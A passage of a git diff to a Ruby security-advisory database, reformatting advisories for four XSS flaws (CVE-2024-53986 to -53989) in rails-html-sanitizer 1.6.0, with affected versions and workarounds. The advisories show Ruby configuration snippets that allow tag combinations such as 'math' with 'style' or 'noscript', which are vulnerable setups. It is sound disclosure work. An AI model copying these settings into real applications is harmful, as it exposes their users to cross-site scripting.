-    overridden the sanitizer's allowed tags in the following way:
-
-    - the "math" and "style" elements are both explicitly allowed
-
-    Code is only impacted if Rails is configured to use HTML5 sanitization,
-    please see documentation for
-    [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-    for more information on these configuration options.
-
-    The default configuration is to disallow these elements. Code is only
-    impacted if allowed tags are being overridden. Applications may be
-    doing this in a few different ways:
-
-    1. using application configuration to configure Action View sanitizers'
-       allowed tags:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["math", "style"]
-      ```
-
-      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    2. using a `:tags` option to the Action View helper `sanitize`:
-
-      ```
-      <= sanitize @comment.body, tags: ["math", "style"]>
-      ```
-
-      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
-
-      ```ruby
-      # class-level option
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "style"]
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer
-       instance method `sanitize`:
-
-      ```ruby
-      # instance-level option
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "style"])
-      ```
-
-      (note that this class may also be referenced as
-       `Rails::Html::SafeListSanitizer`)
-
-    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
-
-      ```ruby
-      ActionText::ContentHelper.allowed_tags = ["math", "style"]
-      ```
-
-    All users overriding the allowed tags by any of the above mechanisms
-    to include both "math" and "style" should either upgrade or use one
-    of the workarounds.
-
-    ## Workarounds
-
-    Any one of the following actions will work around this issue:
-
-    - Remove "math" or "style" from the overridden allowed tags,
-    - Or, downgrade sanitization to HTML4 (see documentation for
-      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-      for more information).
-
-    ## References
-
-    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
-    - Original report: https://hackerone.com/reports/2519941
-
-    ## Credit
-
-    This vulnerability was responsibly reported by So Sakaguchi (mokusou).
-  cvss_v4: 2.3
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-53986
-    - https://hackerone.com/reports/2931636
-    - https://github.com/rails/rails-html-sanitizer/blob/v1.6.1/CHANGELOG.md
-    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-638j-pmjw-jq48
-    - https://github.com/rails/rails-html-sanitizer/commit/f02ffbb8465e73920b6de0da940f5530f855965e
-    - https://github.com/advisories/GHSA-638j-pmjw-jq48
----
+---
+layout: advisory
+title: 'CVE-2024-53986 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
+  with certain configurations'
+comments: false
+categories:
+- rails-html-sanitizer
+- rails
+advisory:
+  gem: rails-html-sanitizer
+  framework: rails
+  cve: 2024-53986
+  ghsa: 638j-pmjw-jq48
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-638j-pmjw-jq48
+  title: rails-html-sanitizer has XSS vulnerability with certain configurations
+  date: 2024-12-02
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
+
+    * Versions affected: 1.6.0
+    * Not affected: < 1.6.0
+    * Fixed versions: 1.6.1
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer may allow an attacker to inject content if
+    HTML5 sanitization is enabled and the application developer has
+    overridden the sanitizer's allowed tags in the following way:
+
+    - the "math" and "style" elements are both explicitly allowed
+
+    Code is only impacted if Rails is configured to use HTML5 sanitization,
+    please see documentation for
+    [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+    for more information on these configuration options.
+
+    The default configuration is to disallow these elements. Code is only
+    impacted if allowed tags are being overridden. Applications may be
+    doing this in a few different ways:
+
+    1. using application configuration to configure Action View sanitizers'
+       allowed tags:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["math", "style"]
+      ```
+
+      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    2. using a `:tags` option to the Action View helper `sanitize`:
+
+      ```
+      <= sanitize @comment.body, tags: ["math", "style"]>
+      ```
+
+      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
+
+      ```ruby
+      # class-level option
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "style"]
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer
+       instance method `sanitize`:
+
+      ```ruby
+      # instance-level option
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "style"])
+      ```
+
+      (note that this class may also be referenced as
+       `Rails::Html::SafeListSanitizer`)
+
+    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
+
+      ```ruby
+      ActionText::ContentHelper.allowed_tags = ["math", "style"]
+      ```
+
+    All users overriding the allowed tags by any of the above mechanisms
+    to include both "math" and "style" should either upgrade or use one
+    of the workarounds.
+
+    ## Workarounds
+
+    Any one of the following actions will work around this issue:
+
+    - Remove "math" or "style" from the overridden allowed tags,
+    - Or, downgrade sanitization to HTML4 (see documentation for
+      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+      for more information).
+
+    ## References
+
+    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
+    - Original report: https://hackerone.com/reports/2519941
+
+    ## Credit
+
+    This vulnerability was responsibly reported by So Sakaguchi (mokusou).
+  cvss_v4: 2.3
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53986
+    - https://hackerone.com/reports/2931636
+    - https://github.com/rails/rails-html-sanitizer/blob/v1.6.1/CHANGELOG.md
+    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-638j-pmjw-jq48
+    - https://github.com/rails/rails-html-sanitizer/commit/f02ffbb8465e73920b6de0da940f5530f855965e
+    - https://github.com/advisories/GHSA-638j-pmjw-jq48
+---
diff --git a/advisories/_posts/2024-12-02-CVE-2024-53987.md b/advisories/_posts/2024-12-02-CVE-2024-53987.md
index a12aad2f..501b5f45 100644
--- a/advisories/_posts/2024-12-02-CVE-2024-53987.md
+++ b/advisories/_posts/2024-12-02-CVE-2024-53987.md
@@ -1,125 +1,125 @@
----
-layout: advisory
-title: 'CVE-2024-53987 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
-  with certain configurations'
-comments: false
-categories:
-- rails-html-sanitizer
-- rails
-advisory:
-  gem: rails-html-sanitizer
-  framework: rails
-  cve: 2024-53987
-  ghsa: 2x5m-9ch4-qgrr
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-2x5m-9ch4-qgrr
-  title: rails-html-sanitizer has XSS vulnerability with certain configurations
-  date: 2024-12-02
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
-
-    * Versions affected: 1.6.0
-    * Not affected: < 1.6.0
-    * Fixed versions: 1.6.1
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer may allow an attacker to inject content if
-    HTML5 sanitization is enabled and the application developer has
-    overridden the sanitizer's allowed tags in the following way:
-
-    - the "style" element is explicitly allowed
-    - the "svg" or "math" element is not allowed
-
-    Code is only impacted if Rails is configured to use HTML5 sanitization,
-    please see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-    for more information on these configuration options.
-
-    The default configuration is to disallow all of these elements. Code
-    is only impacted if allowed tags are being overridden. Applications
-    may be doing this in a few different ways:
-
-    1. using application configuration to configure Action View sanitizers'
-       allowed tags:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["style"]
-      ```
-
-      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    2. using a `:tags` option to the Action View helper `sanitize`:
-
-      ```
-      <= sanitize @comment.body, tags: ["style"] >
-      ```
-
-      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
-
-      ```ruby
-      # class-level option
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["style"]
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer instance method `sanitize`:
-
-      ```ruby
-      # instance-level option
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["style"])
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
-
-      ```ruby
-      ActionText::ContentHelper.allowed_tags = ["style"]
-      ```
-
-    All users overriding the allowed tags by any of the above mechanisms
-    to include "style" and omit "svg" or "math" should either upgrade
-    or use one of the workarounds.
-
-    ## Workarounds
-
-    Any one of the following actions will work around this issue:
-
-    - Remove "style" from the overridden allowed tags,
-    - Or, downgrade sanitization to HTML4 (see documentation for
-      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-      for more information).
-
-    ## References
-
-    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
-    - Original report: https://hackerone.com/reports/2519936
-
-    ## Credit
-
-    This vulnerability was responsibly reported by So Sakaguchi (mnokusou).
-  cvss_v4: 2.3
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-53987
-    - https://hackerone.com/reports/2931639
-    - https://hackerone.com/reports/2931688
-    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-2x5m-9ch4-qgrr
-    - https://github.com/rails/rails-html-sanitizer/commit/f02ffbb8465e73920b6de0da940f5530f855965e
-    - https://github.com/advisories/GHSA-2x5m-9ch4-qgrr
----
+---
+layout: advisory
+title: 'CVE-2024-53987 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
+  with certain configurations'
+comments: false
+categories:
+- rails-html-sanitizer
+- rails
+advisory:
+  gem: rails-html-sanitizer
+  framework: rails
+  cve: 2024-53987
+  ghsa: 2x5m-9ch4-qgrr
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-2x5m-9ch4-qgrr
+  title: rails-html-sanitizer has XSS vulnerability with certain configurations
+  date: 2024-12-02
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
+
+    * Versions affected: 1.6.0
+    * Not affected: < 1.6.0
+    * Fixed versions: 1.6.1
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer may allow an attacker to inject content if
+    HTML5 sanitization is enabled and the application developer has
+    overridden the sanitizer's allowed tags in the following way:
+
+    - the "style" element is explicitly allowed
+    - the "svg" or "math" element is not allowed
+
+    Code is only impacted if Rails is configured to use HTML5 sanitization,
+    please see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+    for more information on these configuration options.
+
+    The default configuration is to disallow all of these elements. Code
+    is only impacted if allowed tags are being overridden. Applications
+    may be doing this in a few different ways:
+
+    1. using application configuration to configure Action View sanitizers'
+       allowed tags:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["style"]
+      ```
+
+      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    2. using a `:tags` option to the Action View helper `sanitize`:
+
+      ```
+      <= sanitize @comment.body, tags: ["style"] >
+      ```
+
+      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
+
+      ```ruby
+      # class-level option
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["style"]
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer instance method `sanitize`:
+
+      ```ruby
+      # instance-level option
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["style"])
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
+
+      ```ruby
+      ActionText::ContentHelper.allowed_tags = ["style"]
+      ```
+
+    All users overriding the allowed tags by any of the above mechanisms
+    to include "style" and omit "svg" or "math" should either upgrade
+    or use one of the workarounds.
+
+    ## Workarounds
+
+    Any one of the following actions will work around this issue:
+
+    - Remove "style" from the overridden allowed tags,
+    - Or, downgrade sanitization to HTML4 (see documentation for
+      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+      for more information).
+
+    ## References
+
+    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
+    - Original report: https://hackerone.com/reports/2519936
+
+    ## Credit
+
+    This vulnerability was responsibly reported by So Sakaguchi (mnokusou).
+  cvss_v4: 2.3
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53987
+    - https://hackerone.com/reports/2931639
+    - https://hackerone.com/reports/2931688
+    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-2x5m-9ch4-qgrr
+    - https://github.com/rails/rails-html-sanitizer/commit/f02ffbb8465e73920b6de0da940f5530f855965e
+    - https://github.com/advisories/GHSA-2x5m-9ch4-qgrr
+---
diff --git a/advisories/_posts/2024-12-02-CVE-2024-53988.md b/advisories/_posts/2024-12-02-CVE-2024-53988.md
index 4ff7781a..eb0b5529 100644
--- a/advisories/_posts/2024-12-02-CVE-2024-53988.md
+++ b/advisories/_posts/2024-12-02-CVE-2024-53988.md
@@ -1,134 +1,134 @@
----
-layout: advisory
-title: 'CVE-2024-53988 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
-  with certain configurations'
-comments: false
-categories:
-- rails-html-sanitizer
-- rails
-advisory:
-  gem: rails-html-sanitizer
-  framework: rails
-  cve: 2024-53988
-  ghsa: cfjx-w229-hgx5
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-cfjx-w229-hgx5
-  title: rails-html-sanitizer has XSS vulnerability with certain configurations
-  date: 2024-12-02
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
-
-    * Versions affected: 1.6.0
-    * Not affected: < 1.6.0
-    * Fixed versions: 1.6.1
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer may allow an attacker to inject content
-    if HTML5 sanitization is enabled and the application developer
-    has overridden the sanitizer's allowed tags in the following way:
-
-    - the "math", "mtext", "table", and "style" elements are allowed
-    - and either "mglyph" or "malignmark" are allowed
-
-    Code is only impacted if Rails is configured to use HTML5 sanitization,
-    please see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-    for more information on these configuration options.
-
-    The default configuration is to disallow all of these elements
-    except for "table". Code is only impacted if allowed tags are being
-    overridden. Applications may be doing this in a few different ways:
-
-    1. using application configuration to configure Action View sanitizers'
-       allowed tags:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["math", "mtext", "table", "style", "mglyph"]
-      # or
-      config.action_view.sanitized_allowed_tags = ["math", "mtext", "table", "style", "malignmark"]
-      ```
-
-      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    2. using a `:tags` option to the Action View helper `sanitize`:
-
-      ```
-      <= sanitize @comment.body, tags: ["math", "mtext", "table", "style", "mglyph"] >
-      <# or >
-      <= sanitize @comment.body, tags: ["math", "mtext", "table", "style", "malignmark"] >
-      ```
-
-      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
-
-      ```ruby
-      # class-level option
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "mtext", "table", "style", "mglyph"]
-      # or
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "mtext", "table", "style", "malignmark"]
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer
-       instance method `sanitize`:
-
-      ```ruby
-      # instance-level option
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "mtext", "table", "style", "mglyph"])
-      # or
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "mtext", "table", "style", "malignmark"])
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
-
-      ```ruby
-      ActionText::ContentHelper.allowed_tags = ["math", "mtext", "table", "style", "mglyph"]
-      # or
-      ActionText::ContentHelper.allowed_tags = ["math", "mtext", "table", "style", "malignmark"]
-      ```
-
-    All users overriding the allowed tags by any of the above mechanisms
-    to include ("math" and "mtext" and "table" and "style" and ("mglyph"
-    or "malignmark")) should either upgrade or use one of the workarounds.
-
-    ## Workarounds
-
-    Any one of the following actions will work around this issue:
-
-    - Remove "mglyph" and "malignmark" from the overridden allowed tags,
-    - Or, downgrade sanitization to HTML4 (see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-      for more information).
-
-    ## References
-
-    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
-    - Original report: https://hackerone.com/reports/2519936
-
-    ## Credit
-
-    This vulnerability was responsibly reported by So Sakaguchi (mokusou).
-  cvss_v4: 2.3
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-53988
-    - https://hackerone.com/reports/2931710
-    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-cfjx-w229-hgx5
-    - https://github.com/rails/rails-html-sanitizer/commit/a0a3e8b76b696446ffc6bffcff3bc7b7c6393c72
-    - https://github.com/advisories/GHSA-cfjx-w229-hgx5
----
+---
+layout: advisory
+title: 'CVE-2024-53988 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
+  with certain configurations'
+comments: false
+categories:
+- rails-html-sanitizer
+- rails
+advisory:
+  gem: rails-html-sanitizer
+  framework: rails
+  cve: 2024-53988
+  ghsa: cfjx-w229-hgx5
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-cfjx-w229-hgx5
+  title: rails-html-sanitizer has XSS vulnerability with certain configurations
+  date: 2024-12-02
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
+
+    * Versions affected: 1.6.0
+    * Not affected: < 1.6.0
+    * Fixed versions: 1.6.1
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer may allow an attacker to inject content
+    if HTML5 sanitization is enabled and the application developer
+    has overridden the sanitizer's allowed tags in the following way:
+
+    - the "math", "mtext", "table", and "style" elements are allowed
+    - and either "mglyph" or "malignmark" are allowed
+
+    Code is only impacted if Rails is configured to use HTML5 sanitization,
+    please see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+    for more information on these configuration options.
+
+    The default configuration is to disallow all of these elements
+    except for "table". Code is only impacted if allowed tags are being
+    overridden. Applications may be doing this in a few different ways:
+
+    1. using application configuration to configure Action View sanitizers'
+       allowed tags:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["math", "mtext", "table", "style", "mglyph"]
+      # or
+      config.action_view.sanitized_allowed_tags = ["math", "mtext", "table", "style", "malignmark"]
+      ```
+
+      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    2. using a `:tags` option to the Action View helper `sanitize`:
+
+      ```
+      <= sanitize @comment.body, tags: ["math", "mtext", "table", "style", "mglyph"] >
+      <# or >
+      <= sanitize @comment.body, tags: ["math", "mtext", "table", "style", "malignmark"] >
+      ```
+
+      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
+
+      ```ruby
+      # class-level option
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "mtext", "table", "style", "mglyph"]
+      # or
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "mtext", "table", "style", "malignmark"]
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer
+       instance method `sanitize`:
+
+      ```ruby
+      # instance-level option
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "mtext", "table", "style", "mglyph"])
+      # or
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "mtext", "table", "style", "malignmark"])
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
+
+      ```ruby
+      ActionText::ContentHelper.allowed_tags = ["math", "mtext", "table", "style", "mglyph"]
+      # or
+      ActionText::ContentHelper.allowed_tags = ["math", "mtext", "table", "style", "malignmark"]
+      ```
+
+    All users overriding the allowed tags by any of the above mechanisms
+    to include ("math" and "mtext" and "table" and "style" and ("mglyph"
+    or "malignmark")) should either upgrade or use one of the workarounds.
+
+    ## Workarounds
+
+    Any one of the following actions will work around this issue:
+
+    - Remove "mglyph" and "malignmark" from the overridden allowed tags,
+    - Or, downgrade sanitization to HTML4 (see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+      for more information).
+
+    ## References
+
+    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
+    - Original report: https://hackerone.com/reports/2519936
+
+    ## Credit
+
+    This vulnerability was responsibly reported by So Sakaguchi (mokusou).
+  cvss_v4: 2.3
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53988
+    - https://hackerone.com/reports/2931710
+    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-cfjx-w229-hgx5
+    - https://github.com/rails/rails-html-sanitizer/commit/a0a3e8b76b696446ffc6bffcff3bc7b7c6393c72
+    - https://github.com/advisories/GHSA-cfjx-w229-hgx5
+---
diff --git a/advisories/_posts/2024-12-02-CVE-2024-53989.md b/advisories/_posts/2024-12-02-CVE-2024-53989.md
index def72c25..9faaf5a8 100644
--- a/advisories/_posts/2024-12-02-CVE-2024-53989.md
+++ b/advisories/_posts/2024-12-02-CVE-2024-53989.md
@@ -1,124 +1,124 @@
----
-layout: advisory
-title: 'CVE-2024-53989 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
-  with certain configurations'
-comments: false
-categories:
-- rails-html-sanitizer
-- rails
-advisory:
-  gem: rails-html-sanitizer
-  framework: rails
-  cve: 2024-53989
-  ghsa: rxv5-gxqc-xx8g
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rxv5-gxqc-xx8g
-  title: rails-html-sanitizer has XSS vulnerability with certain configurations
-  date: 2024-12-02
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
-
-    * Versions affected: 1.6.0
-    * Not affected: < 1.6.0
-    * Fixed versions: 1.6.1
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer may allow an attacker to inject content if
-    HTML5 sanitization is enabled and the application developer has
-    overridden the sanitizer's allowed tags in the following way:
-
-    - the "noscript" element is explicitly allowed
-
-    Code is only impacted if Rails is configured to use HTML5 sanitization,
-    please see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-    for more information on these configuration options.
-
-    The default configuration is to disallow all of these elements. Code
-    is only impacted if allowed tags are being overridden. Applications
-    may be doing this in a few different ways:
-
-    1. using application configuration to configure Action View sanitizers'
-       allowed tags:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["noscript"]
-      ```
-
-      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    2. using a `:tags` option to the Action View helper `sanitize`:
-
-      ```
-      <= sanitize @comment.body, tags: ["noscript"] >
-      ```
-
-      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
-
-      ```ruby
-      # class-level option
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["noscript"]
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer instance method `sanitize`:
-
-      ```ruby
-      # instance-level option
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["noscript"])
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
-
-      ```ruby
-      ActionText::ContentHelper.allowed_tags = ["noscript"]
-      ```
-
-    All users overriding the allowed tags by any of the above
-    mechanisms to include "noscript" should either upgrade or use
-    one of the workarounds.
-
-    ## Workarounds
-
-    Any one of the following actions will work around this issue:
-
-    - Remove "noscript" from the overridden allowed tags,
-    - Or, downgrade sanitization to HTML4 (see documentation for
-      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-      for more information).
-
-    ## References
-
-    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
-    - Original report: https://hackerone.com/reports/2509647
-
-    ## Credit
-
-    This vulnerability was responsibly reported by HackerOne user
-    [@taise](https://hackerone.com/taise?type=user).
-  cvss_v4: 2.3
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-53989
-    - https://hackerone.com/reports/2931691
